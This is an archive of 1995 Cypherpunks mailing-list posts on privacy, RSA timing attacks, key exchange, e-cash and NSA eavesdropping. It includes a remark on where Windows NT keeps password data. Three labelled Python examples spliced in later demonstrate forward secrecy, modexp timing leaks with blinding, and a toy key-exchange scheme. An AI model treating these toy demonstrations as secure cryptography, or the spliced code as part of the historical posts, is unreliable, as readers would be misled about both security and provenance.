> | out his wallet and handed him 10 crisp $100 bills.  :-)
> 
> Great.  mention it where the IRS is sure to be listening.  :)
> 

Why would the IRS listen?  Everyone knows the tax system is voluntary.
 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Tue, 12 Dec 95 05:32:38 PST
To: cypherpunks@toad.com
Subject: Re: Third generation privacy
Message-ID: <199512121201.GAA24738@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 15:50:23 -0500
> To:            cypherpunks@toad.com
> Subject:       Third generation privacy
> From:          tallpaul@pipeline.com (tallpaul)

> On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp@netcom.com)" 
> <khijol!netcom.com!ecarp>' wrote:  
>   
> >Another, not-so-obvious reason to encrypt stuff, especially stuff   
> >that goes out over the net, is that folks can suck your email off the   
> >net and gather all sorts of useful information.  This has all kinds   
> >of annoying implications, especially for people who gather   
> >demographics and other data for constructing email lists for sale.  
> >  
> >-- short ed  
>   
> Another related issue is what I'll call "third generation" privacy. This 
> exists when I want privacy not for myself or even the person with whom I'm 
> communicating but to protect the privacy of innocent third parties. E.g.:  
>   
> Grandpa is getting senile and I'm communicating with a second family member
> 
> on how we should handle the problem;  
>   
> My friend Jane was just raped and I'm communicating with a mutual friend 
> about how we can help her.  
>   
> The anti-freedom forces have tried to define the parameters of the debate 
> inside the boundaries of the "four horsemen." We need to understand that we
> 
> do not have to remain within those false boundaries and, in fact, it is 
> very good not to.  

I run a sexual abuse survivor server, in which issues like these 
arise almost daily.  Anonymity and privacy are very important issues 
for these folks - for some of them, their survival depends on it 
(whether or not this is a provable issue is irrelevant).  I try, as 
best as I can, to provide an environment that encourages trust and 
openness by discouraging cheating - but the fact remains that 
people's trust in the server and the services it provides is a 
function of people's trust in *me*.  It would be, as Doyle might say, 
"simplicity itself" to violate people's privacy by reading their 
email, or watching their screen as they type, and I'd like to *not* 
have that ability, but the fact remains, I do.

I wish it weren't so - people should be able to have a place to go 
whereby their anonymity and privacy can be guaranteed, without having 
to trust the operator at all.  Zero-knowledge protocols can help, I suspect, but 
the fact remains that they have to trust *me* at some point in the 
process, much as people have to trust the folks running First Virtual 
and the other people doing the digicash thing.

I think that Pegasus with PGP will go a long way towards helping.  If 
someone is just using the server to store encrypted email and route 
end-to-end encrypted packets, then I'm "out of the loop" so to speak, 
and can concentrate on providing a common carrier service instead of 
having the risk associated with being a publisher.  Most of these 
folks who use my server are pretty "computer illiterate" - the fact 
that some of them can even log in and send email is a miracle - no 
slight intended.  The point is, they need a *simple* solution to that 
privacy problem.

By the way, there's a well-known anonymous server whose operator does 
*not* have the same viewpoint, and considers himself a publisher, but 
doesn't recognize the inherent associated risks.  To him, people are 
using his system, and so he has the right to "see what goes through 
his system."  To me, this places both himself and the people who 
use his server at grave risk.  He is setting himself up for a massive 
court fight, and they are setting themselves up to having their 
privacy being violated.  I'd rather not take the risk, myself, but I 
suppose he has nothing better to spend his money on than lawyers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 95 05:06:37 PST
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl>
Message-ID: <199512121306.IAA02006@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
>  > Timings like the ones listed are trivial to take in
>  > establishing things like SSL sessions, or Photuris sessions.
>  > The danger is to online protocols, not to PGP.
> 
> This must be a new and interesting definition of the word
> "trivial" with which I was previously unfamiliar.
> 
> Quite frankly, I would be extremely surprised if anyone mounted a
> successful hostile attack against a server's RSA certificate
> using timings of remotely initiated SSL sessions outside of a
> controlled laboratory environment.

Go ahead and trust that no one can do it, then. Considering that NTP
can synch up clocks over the net with astonishing accuracy with
multiple probes, it would be hard to believe that you couldn't
similarly dramatically reduce the effects of network delays for the
purposes of mounting an attack on an RSA key, too.

However, if you don't believe it is possible, why, go ahead and ignore
it. Not my problem what you do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 95 05:38:28 PST
To: bryce@colorado.edu
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512112006.NAA15060@taussky.cs.colorado.edu>
Message-ID: <IknMFgeMc50eQ2iy1f@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 11-Dec-95 Re: Usability of Cryptograp..
Bryce@taussky.cs.colorad (6455)

> I challenge you, however, to go beyond pointing this problem
> out and start suggesting some approaches to alleviating it.

Actually, this was something I was strongly considering doing as a major
new venture *until* Einar Stefferud introduced me to Lee Stein and we
realized that you could do payments without any cryptography at all. 
That, as you have seen, turned into a fairly major distraction.  I'd
still like to get back to usable crypto some day, however.

There are about a gazillion *easy* ways to make crypto software more
usable.  PGP is a *great* starting point in this regard, as almost any
user interface change is an improvement.  :-)

What's less obvious, and most critical, is how to map the complexities
of key management onto a usable interface.  What few ideas I have in
this regard are, well, ones I'd really like to productize some day,
which makes me a bit reluctant to suggest them publicly at this
point.....  I guess the one hint I'll drop is that the art of designing
good user interfaces usually comes down to choosing the right
abstractions or metaphors.
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 95 07:14:58 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
Message-ID: <199512121533.JAA21358@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 12/11/95 -0500, it was written:
>[...]
>> but since the contents of the key were never 
>> touched on DIRECTLY, no eavesdropper could determine the key, 
>
>No, the integrity of the system really depends upon the quantum properties
>of light. Among other things, Heisenberg's Uncertainty Principle makes it
>impossible for Eve to "eavesdrop" on the photons without affecting them
>measurably.
>
Disregarding the "quantum properties of light" issue, if Eve can listen
in on every communication between Alice and Bob about their keys, then
doesn't she have enough information to reconstruct the key herself?

The way I understand the system, in order for Alice to have Bob's key (and
vice versa) they each have to transmit a considerable amount of data about
their keys.  Even if those data are in the form of "twenty questions," neither
knows anything about the other's key at the start.  Is there something
painfully obvious that I'm missing?

>In this situation Eve can read the email traffic without modifying it, so the
>game is up.
Exactly.

Dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 95 07:15:02 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512121533.JAA21362@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:

>> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
>> | out his wallet and handed him 10 crisp $100 bills.  :-)
>> Great.  mention it where the IRS is sure to be listening.  :)
>Why would the IRS listen?  Everyone knows the tax system is voluntary.

Do you know something I don't?  :)
Would you mind sharing?  :)

Dave
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 12 Dec 95 07:29:41 PST
To: cypherpunks@toad.com
Subject: Today's Baltimore Sun on the NSA...
Message-ID: <v02130504acf35085d866@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



As I mentioned on Sunday, the Baltimore Sun is running a long
series on the NSA. Today, they published an article that
described how the NSA routinely listens in to the phone calls of
Americans. This happens in two ways. First, if the conversation
leaves the country then the NSA can intercept it. Second, the
NSA is also allowed to grab local phone calls for "training"
purposes.

The funniest part of the article mentioned that Henry Kissinger
got both ends of the stick. He relied on NSA to pass him
sensitive information about his rivals. But the head of the
Department of Defense, who got to appoint the head of the NSA,
made sure that the NSA told him what Kissinger was up to.

The strangest anecdote involved a Baltimore Sun reporter who
called Cuban diplomats from overseas. This was picked up by NSA
and the eavesdropper openly chatted about it at a civilian cocktail
party. The details got back to the reporter. The parties in the
Baltimore suburbs are from the pages of Fleming not from the
pages of Cheever.

There is some debate about the whole issue of snooping on
American citizens. Everyone quoted on the record says it's all
pretty upstanding and good. The paper also gives a fair amount
of ink to the argument that American citizens could be involved
in terrorism too. This seems to be logical to me.

The deepest point made was that NSA could never really assume
greater law enforcement practices because this would involve
disseminating their information to a much larger audience. Since
using secret information often reveals that you can get it,
there is little doubt that people would stop using the phone
system and the other information sponges. So much for absolute
power.

-Peter Wayner

-=-=-=
 On Friday, the last article in the series is promised to
report, "The next war will be fought with computers. NSA is
getting ready." You will be able to buy a reprint of the NSA
stories from SunSource. $3.95. Call 410-332-6962.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 12 Dec 95 02:48:33 PST
To: cypherpunks@toad.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL          cracker...)
In-Reply-To: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com>
Message-ID: <30CD5E4C.56A@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ted Cabeen wrote:

> I took a quick look in my NT registry and you can get access to the Account
> Manager section of the registry by manually changing the permissions and
> giving yourself access.  I didn't have the time to look at all of the
> entries in the registry, but there's a lot of stuff there and I wouldn't be
> surprised if the encrypted passwords were available.  Of course, you have to
> be an administrator to change the permissions, but it is possible.

The encrypted passwords are in the "SECURITY" section, which the OS will not
let you change the permissions to.  Most user account information is available
under NT via the NetUser... API functions, the passwords are not.  You probably
came across the settings for the Security Account Manager, not the data that it
looks after.


Regards,

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthias Schunter <schunter@informatik.uni-hildesheim.de>
Date: Tue, 12 Dec 95 02:49:42 PST
To: David Klur <dklur@dttus.com>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <v02120d09acf307537019@[147.172.54.29]>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. Klur,


I'm a member of the CAFE consortium but I cannot answer your question.
As far as we know, the details of the Mondex protocols are still 
confidential (or only available under a non-disclosure license). 

However, I can give you some details about CAFE. 

The CAFE system is a cheque based system. This means that the customer receives an electronic chequebook, where each cheque is (blindly) signed by the bank.
During each payment the customer has to use one of these signed cheques.

Some of its properties are:
 secure
   Breaking the card results in a limited gain, since soon the customer will
   run out of cheques (Mondex' security is quite likely only based on 
   tamper-resistance).
 open
   Due to the open public-key architecture used, the system is open, e.g., it 
   supports multiple-issuer, multiple-currencies.
   One part of this openness is the public availability of the specifications.
 practical
   It provides full loss- and fault-tolerance (i.e. if you lose your wallet 
   you're able to recover your electronic money) and supports fast
   micropayments (e.g., for phone ticks).
 privacy-protecting
   The privacy of the user is protected.

We will soon publish our full protocol and architecture specifications.
A short 50-page summary is already available (PostScript). 
Additional information may be found at
 http://www.informatik.uni-hildesheim.de/~sirene/projects/cafe/index.html

Please contact me, if you are interested in this abstract or if you have additional questions.


Regards,

 M. Schunter


--- Forwarded mail from "David Klur" <dklur@dttus.com>

Date: Mon, 11 Dec 95 12:13:48 CST
From: "David Klur" <dklur@dttus.com>
To: cypherpunks@toad.com, WWW-BUYINFO@allegra.att.com
     
     Is the Cafe e-cash system different than Mondex? If so, how?
     Also, does anyone know when the Mondex trial will start in Delaware?

---End of forwarded mail from "David Klur" <dklur@dttus.com>

% Matthias <Schunter@acm.org> Uni Hildesheim +49(5121)883-788 fax-732





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 11 Dec 95 20:26:50 PST
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951212135724.12253H-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Anonymous wrote:
>  > Timings like the ones listed are trivial to take in
>  > establishing things like SSL sessions, or Photuris sessions.
>  > The danger is to online protocols, not to PGP.
> This must be a new and interesting definition of the word
> "trivial" with which I was previously unfamiliar.
> 
> Quite frankly, I would be extremely surprised if anyone mounted a
> successful hostile attack against a server's RSA certificate
> using timings of remotely initiated SSL sessions outside of a
> controlled laboratory environment.

Well let's put it this way, people have hacked machines through firewalls
via IP spoofing, broken a single SSL RC4-40 bit session after weeks of CPU
time, are you saying that perhaps being able to break a fixed
Diffie-Hellman key on a central router/computer would not be worth trying? 
Remember, if you broke this key, and had recorded the last 6 months worth
of traffic, you can now decode all of this traffic.  Once you have that
secret key and those packet logs, the decoding is a trivial and mechanical
process (trust me on this one).  One of the major advantages of choosing a
new secret key per DH negotiation is that you lose this capacity to
decrypt previous and future sessions. When we talk about taking 100s of
years to factor large primes, a system that may work after a month or 2 of
collecting data and statistics is definitely an easier proposition,
especially when the reward is all past and future traffic. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
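
The exposure argument in the message above, as an added Python example that is not part of the original post: a recorded transcript is replayed against one leaked server secret, first with a fixed Diffie-Hellman key and then with a fresh key per negotiation. The modulus, generator and function names are constructed for illustration and are far too small for real use.

```python
import hashlib
import secrets

P = 2**127 - 1   # constructed toy modulus (a Mersenne prime), illustration only
G = 3            # constructed base


def _secret():
    """A random private exponent."""
    return secrets.randbelow(P - 3) + 2


def _session_key(shared):
    """Derive a symmetric session key from the DH shared value."""
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def run_sessions(count, fixed_server_secret=None):
    """Simulate `count` key agreements.

    Returns (recorded, keys, server_secrets). `recorded` holds only what a
    passive recorder sees on the wire: (client_public, server_public).
    With fixed_server_secret set, the server reuses one key for every
    session; otherwise it draws a new one per negotiation.
    """
    recorded, keys, server_secrets = [], [], []
    for _ in range(count):
        a = _secret()
        b = fixed_server_secret if fixed_server_secret is not None else _secret()
        client_pub, server_pub = pow(G, a, P), pow(G, b, P)
        recorded.append((client_pub, server_pub))
        keys.append(_session_key(pow(server_pub, a, P)))
        server_secrets.append(b)
    return recorded, keys, server_secrets


def exposed_sessions(recorded, leaked_secret):
    """Session keys derivable from the recording once one server secret leaks.

    Entries are None for sessions the leaked secret does not belong to.
    """
    leaked_pub = pow(G, leaked_secret, P)
    return [
        _session_key(pow(client_pub, leaked_secret, P))
        if server_pub == leaked_pub else None
        for client_pub, server_pub in recorded
    ]


if __name__ == "__main__":
    fixed = _secret()
    recorded, keys, _ = run_sessions(6, fixed_server_secret=fixed)
    hit = sum(k is not None for k in exposed_sessions(recorded, fixed))
    print(f"fixed key:       {hit} of {len(keys)} recorded sessions exposed")

    recorded, keys, server_secrets = run_sessions(6)
    hit = sum(k is not None for k in exposed_sessions(recorded, server_secrets[-1]))
    print(f"per-session key: {hit} of {len(keys)} recorded sessions exposed")
```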






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 95 14:34:43 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Time-based cryptanalysis: How to defeat it?
In-Reply-To: <199512110854.AAA14652@ix2.ix.netcom.com>
Message-ID: <199512122233.RAA21952@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
> The most interesting detail in the paper, to me, was:
> 
> PK> Computing optional Ri+1 calculations regardless of whether the exponent 
> PK> bit is set does not work and can actually make the attack easier;
> PK> the computations still diverge but attackers no longer have to identify
> PK> the lack of a correlation for adjacent zero exponent bits. 
> 
> My immediate reaction to the description of the timing attack on 
> Diffie-Hellman had, of course, been to do precisely that :-)

I don't understand why Kocher's point is correct. For example, why do the
times diverge with the following modification of the modexp algorithm on
pg.2 of the abstract ?

	Algorithm to compute R = y^x mod n:
		Let R_0 = 1.
		Let y_0 = y.
		For i = 0 upto (bits_in_x - 1):
			Let M = (R_i * y_i) mod n.
			Let R_(i+1) = (bit i of x) * M  +
					(1 - (bit i of x)) * R_i.
			Let y_(i+1) = (y_i)^2 mod n.
		End.

(I suppose I should wait for the full paper....)

-Futplex <futplex@pseudonym.com>
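
An added Python illustration, not part of the message above or of Kocher's paper: it runs the posted always-multiply variant next to plain square-and-multiply and records the operands of every multiplication, then applies base blinding (the countermeasure discussed elsewhere in this thread). The toy RSA parameters are constructed, and the assumption is that the cost of a modular multiplication depends on its operand values.

```python
import secrets
from math import gcd

# Constructed toy RSA parameters (n = 61 * 53); illustration only.
N, E, D, BITS = 3233, 17, 2753, 12


def modexp_branching(y, x, n):
    """Right-to-left square-and-multiply that multiplies only for set bits.

    Returns (result, operand pairs of every multiplication performed).
    """
    r, mults = 1, []
    for i in range(x.bit_length()):
        if (x >> i) & 1:
            mults.append((r, y))
            r = (r * y) % n
        y = (y * y) % n
    return r, mults


def modexp_always_multiply(y, x, n, bits):
    """The variant posted above: M is computed at every step and R_(i+1)
    is selected arithmetically, for a fixed number of steps."""
    r, mults = 1, []
    for i in range(bits):
        mults.append((r, y))
        m = (r * y) % n
        b = (x >> i) & 1
        r = b * m + (1 - b) * r
        y = (y * y) % n
    return r, mults


def first_divergence(y, x1, x2, n, bits):
    """Index of the first step whose multiplication operands differ between
    two exponents, or None if they never differ."""
    _, a = modexp_always_multiply(y, x1, n, bits)
    _, b = modexp_always_multiply(y, x2, n, bits)
    return next((i for i, (p, q) in enumerate(zip(a, b)) if p != q), None)


def blinded_modexp(c, d, e, n, bits, r=None):
    """Base blinding: exponentiate c * r^e instead of c, then remove r.

    (c * r^e)^d = c^d * r (mod n), so multiplying by r^-1 restores c^d.
    """
    while r is None or gcd(r, n) != 1:
        r = secrets.randbelow(n - 2) + 2
    blinded = (c * pow(r, e, n)) % n
    result, mults = modexp_always_multiply(blinded, d, n, bits)
    return (result * pow(r, -1, n)) % n, mults


if __name__ == "__main__":
    y = 65
    for x in (0b1011, 0b1000):
        print(f"x={x:04b}: branching does {len(modexp_branching(y, x, N)[1])} "
              f"multiplications, always-multiply does "
              f"{len(modexp_always_multiply(y, x, N, BITS)[1])}")
    # The step count no longer depends on x, but R_i (an operand of the
    # next multiplication) does: exponents that differ in bit k feed
    # different operands into step k+1.
    print("operands first differ at step",
          first_divergence(y, 0b1011, 0b1010, N, BITS))
    # With blinding the operands depend on a random r the observer lacks.
    _, ops1 = blinded_modexp(y, D, E, N, BITS)
    _, ops2 = blinded_modexp(y, D, E, N, BITS)
    print("blinded runs share operands:", ops1 == ops2)
```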



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 12 Dec 95 03:52:55 PST
To: turner@TeleCheck.com
Subject: Re: anti-copy
In-Reply-To: <9512112112.AA03120@mercury.telecheck.com>
Message-ID: <199512121152.WAA13728@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com (Cypherpunks Mailing List)
  and turner@TeleCheck.com
 
turner wrote: 
> futplex@pseudonym.com said:
> >> Daark writes: How would it be possible to create files that KNOW they 
> >> are  a copy?  
...
> would be to have itself figure out what track/sector it is on and inject
...
Defraggers, anyone?
...
> To summarize, its possible (under _some_ operating systems), but it is 
> not a good solution to the problem.

How about if you control the operating system and everything, is
it then possible to demonstrate that you don't have other copies?
(Ie escrow agent is able to prove to customer that info destroyed.)

Presumably this would be based on QM, EPR 'paradox' or something like that.
I've read about something called "Quantum Eraser", but I don't know
whether that could be used to store useful info (the vague description
was from an "isn't time weird" viewpoint and erased boring stuff).

Anybody better in QM?

However, I don't think that you'll be able to provide "only one copy",
because once that copy is received and read once the recipient can
recreate it.


Hope I'm making sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMM1tASxV6mvvBgf5AQETAgQAqd7VA7vTI2IyPNJ6MyJbV2Q6BKOQLww8
TB5g1ddVoYbktwQf0BW5YT5E9RKd1jfAvA43ZOd2Q2Po2vmDKid2J9xlwKoqhn1B
Qrn30sKgxETMS+BfTa91dWyT0W9w6uudYubQqZU4MLthhUHT9kq6VuE1PCmTvHUl
cAf2Ku+QhFE=
=CySl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 95 20:14:06 PST
To: cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <199512130413.XAA04532@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


OK. I'll bite. I realize that whenever non-heavy crypto people tackle heavy
crypto problems, the answers are virtually always: (a) obviously wrong; (b)
proposed 400 years ago; (c) not even related to the original question; (d)
all of the above. 
 
Alice says to Bob, in front of all of the other people on the elevator: "I
have generated a large(ish) amount of large(ish) prime numbers and have
recorded all of them. I have multiplied two of the numbers to get an even
larger non-prime number. I have done this a large(ish) number of times
until I have a 'large(ish)/2' set of non-prime numbers. The elements of
this set are [Alice reads off the set of non-prime numbers and Bob along
with the other people on the elevator record them.] Bob, go home and pick
one of the non-prime numbers in the set. Factor it. Use the largest prime
as a private key in your message to me. Since I know what the numbers all
are, I'll try all of them to see which one decrypts your message." 
 
Bob has to factor one large(ish) prime. 
 
Alice has to *try* an average of "large(ish)/2" private keys to decrypt
Bob's message. 
 
The other people on the elevator have to *factor* an average of
"large(ish)/2/2" number of large(ish) numbers to decrypt the message. 
 
The *relative* security then depends on the number of digits in the
large(ish) primes and the number of products in the set Alice reads to Bob.

 
E.G. 
 
Imagine that Alice previously generates 2,000,000 prime numbers, giving her
a set of 1,000,000 products. Neither Bob nor anyone else on the elevator
knows the 2,000,000 primes that Alice has generated. She reads all
1,000,000 products to Bob and everyone else on the elevator. 
 
Imagine that any given product can be factored in 100 MIP days (i.e. a 100
MHz Pentium running for 24 hours or "P-Day"). 
 
Bob factors one and only one of the numbers and uses the factor as a
private key to generate the message. 
 
Neither Alice nor anyone else on the elevator knows what product Bob picked
to factor. 
 
Alice receives the message. She takes the 2,000,000 privately recorded
primes and runs a brute force attack on the encrypted message, decrypting
it in an average of 1,000,000 tries. 
 
The other people on the elevator need to factor each number and then run it
as a brute force attempt to decrypt the message. This takes them an
average of 500,000 P-Days to factor the numbers plus whatever the brute
force time requires. 
 
The relative security develops because it is faster to generate large(ish)
primes and to brute force decryption than to factor the large(ish) primes.
The absolute time it takes to generate the primes and to brute force the
decryption sets the relative time Alice is willing to spend to get a
different relative level of security. If the nasties are the NSA, then
500,000 P-Days is too insecure. If the nasties are Alice and Bob's nosey
neighbor, then 500,000 P-Days is "excessively" secure. If Alice and Bob are
sweet patooties, and the nasty is Alice's father who runs the comp sci
department at the university, then 500,000 P-Days is about right. 
 
Now, if any of you want to waste some time, you can play "kick the newbie"
re points (a) through (d) above. 
 
--tallpaul 
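
The scheme in the message above, run end to end at toy scale as an added example (not part of the original post), counting the work each party does. The prime range, product count, trial-division `factor` and the SHAKE-256/HMAC `seal`/`unseal` stand-in cipher are assumptions, since the post names no cipher or factoring method.

```python
"""Toy run of the elevator scheme: constructed parameters, not secure sizes."""
import hashlib
import hmac
import random


def primes_between(lo, hi):
    """Sieve of Eratosthenes: every prime p with lo <= p < hi."""
    sieve = bytearray([1]) * hi
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(hi ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, hi, i)))
    return [p for p in range(lo, hi) if sieve[p]]


def factor(n):
    """Trial division over odd candidates; returns (p, q, divisions_tried)."""
    tried, d = 0, 3
    while d * d <= n:
        tried += 1
        if n % d == 0:
            return d, n // d, tried
        d += 2
    raise ValueError("not a product of two odd primes")


def seal(prime, plaintext):
    """Stand-in cipher (assumption): SHAKE-256 keystream XOR plus an 8-byte HMAC tag."""
    key = hashlib.sha256(str(prime).encode()).digest()
    stream = hashlib.shake_256(key).digest(len(plaintext))
    body = bytes(a ^ b for a, b in zip(plaintext, stream))
    return hmac.new(key, body, hashlib.sha256).digest()[:8] + body


def unseal(prime, blob):
    """Return the plaintext if `prime` is the right key, else None."""
    key = hashlib.sha256(str(prime).encode()).digest()
    tag, body = blob[:8], blob[8:]
    expected = hmac.new(key, body, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(tag, expected):
        return None
    stream = hashlib.shake_256(key).digest(len(body))
    return bytes(a ^ b for a, b in zip(body, stream))


def run_elevator(n_products=64, seed=1995, message=b"meet at the usual place"):
    rng = random.Random(seed)
    # Alice: 2n secret primes, paired into n products that she reads out loud.
    primes = rng.sample(primes_between(2_000, 20_000), 2 * n_products)
    products = [primes[i] * primes[i + 1] for i in range(0, len(primes), 2)]

    # Bob: factors ONE product of his choice and keys on its larger prime.
    p, q, bob_work = factor(rng.choice(products))
    blob = seal(max(p, q), message)

    # Alice: never factors; she tries the primes she recorded.
    alice_tries, alice_plain = 0, None
    for prime in primes:
        alice_tries += 1
        alice_plain = unseal(prime, blob)
        if alice_plain is not None:
            break

    # Eavesdropper: has only the products, so must factor until a key works.
    eve_work, eve_factored, eve_plain = 0, 0, None
    for n in products:
        a, b, tried = factor(n)
        eve_work += tried
        eve_factored += 1
        eve_plain = unseal(max(a, b), blob)
        if eve_plain is not None:
            break

    return {
        "bob_work": bob_work,          # divisions for one factorisation
        "alice_tries": alice_tries,    # cheap trial decryptions
        "eve_factored": eve_factored,  # products the listener had to factor
        "eve_work": eve_work,          # total divisions across those products
        "alice_plain": alice_plain,
        "eve_plain": eve_plain,
    }


if __name__ == "__main__":
    for name, value in run_elevator().items():
        print(f"{name:13} {value}")
```

The listener's cost is Bob's factoring cost multiplied by the number of products reached, so the margin over Bob grows only linearly with the length of the list Alice reads out.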
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Tue, 12 Dec 95 16:45:02 PST
To: cypherpunks@toad.com
Subject: Timing RSA and Certificates worth ??
Message-ID: <m0tPfIw-0006O8C@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


My limited mind induces me to think that a certificate becomes subject to
timing attacks on the RSA private signing key.
This appears to meet the main criteria of fixed data (for instance, a
bank's certificate in/on ecash), processed widely by a small group of
machines (eg a subset of customers) on inherently untrusted machines (home
PC's) which may or may not have the right software/operating system parts.
Certificates in general, do not appear to lend themselves to "blinding".

In this case, certificate verification  processes seem flawed and highly
unreliable.
eg a merchant gets lots of data containing a bank(s) certificate, and
probably encrypted data. 
Is this the death knell for STT/SEPP and ecash/echeque systems ???

Some ramblings and thoughts.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 95 00:29:00 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem (a.k.a. build a private key in public)
In-Reply-To: <9512130511.AA25229@all.net>
Message-ID: <199512140828.DAA19405@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Alice: tell Bob your public key
> Bob: use Alice's public key to encrypt a random number and tell it to everyone
> 
> Now: start communicating using the random number as a private key.

It's far from clear that this is a patent-free solution.

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Fri, 15 Dec 95 07:10:23 PST
To: "'cypherpunks@toad.com>
Subject: RE: ADDRESS DATABASE?
Message-ID: <c=US%a=_%p=INTERGRAPH%l=EXCH7951215090736LB00D406@exch11>
MIME-Version: 1.0
Content-Type: text/plain


>Another "best way" is to make all calls that you want to be personal with
>a cellular phone.  Most cellular systems don't send ANI and do not provide
>any type of billing information to the phone company.  The number is also by
>nature unlisted and the only way to get it is by you or the cellular
>carrier.  If the cellular carrier gives your number out without your
>permission or a court order they are in BIG trouble..

Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for 
that matter) to transmit ANI & CLID information, even on cellular calls. 
BellSouth thoughtfully put a notice in my last two monthly bills, but then 
